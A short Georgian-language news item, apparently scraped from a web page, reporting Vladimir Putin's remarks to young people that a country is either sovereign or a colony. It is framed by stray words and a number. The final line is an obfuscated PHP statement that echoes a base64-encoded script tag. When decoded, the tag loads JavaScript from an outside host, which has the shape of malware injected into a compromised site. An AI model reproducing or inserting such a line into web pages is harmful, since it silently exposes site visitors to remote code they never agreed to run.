celsiusi
ავერსი შნაიდერი
რუსეთის პრეზიდენტის, ვლადიმერ პუტინის განცხადებით, თუ ქვეყანა და ქვეყნების ჯგუფს არ შეუძლია სუვერენული გადაწყვეტილებების მიღება, მაშინ ეს კოლონიაა, კოლონიას კი პერსპექტივა არ აქვს. ეს განცხადება ვლადიმერ პუტინმა ახალგაზრდებთან შეხვედრაზე გააკეთა.
 
მისი თქმით, ქვეყანა შეიძლება იყოს სუვერენული ან კოლონია, შუალედური მდგომაროება არ არსებობს, კოლონიებს კი ისტორიული პერსპექტივა არ აქვთ.
 
„სამყარო ელვის სისწრაფით იცვლება. და იმისთვის, რომ რაიმე სახის ლიდერობაზე გქონდეს პრეტენზია, მე აღარ ვსაუბრობ გლობალურ ლიდერობაზე, არამედ რაღაცაში მაინც, მაშინ ნებისმიერმა ქვეყანამ უნდა უზრუნველყოს საკუთარი სუვერენიტეტი. ამიტომ შუალედური მდგომარეობა არ არსებობს, ქვეყანა არის სუვერენული ან კოლონიაა.
 
გეოპოლიტიკური ბრძოლა მუდამ მიმდინარეობდა. დიახ, ჩვენს ქვეყანას ხანდახან უწევდა უკან დახევა, მაგრამ მხოლოდ იმისთვის, რომ ძალები მოგვეკრიბა და წინსვლა გაგვეგრძელებინა“,- განაცხადა პუტინმა.
675
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");